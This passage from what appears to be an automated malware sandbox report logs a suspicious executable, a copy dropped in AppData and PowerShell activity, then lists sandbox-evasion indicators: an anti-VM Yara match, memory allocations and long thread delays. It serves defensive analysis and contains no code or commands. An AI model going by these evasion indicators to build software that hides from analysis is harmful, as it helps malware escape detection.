                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 72F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 82F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 8470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 9470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 99D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: A9D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: B9D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 1160000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 9D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 4490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 6FA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 7FA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 8140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 66B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 9200000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: A200000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 599103Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598874Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598765Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598547Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 598092Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597699Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeThread delayed: delay time: 596797Jump to behavior
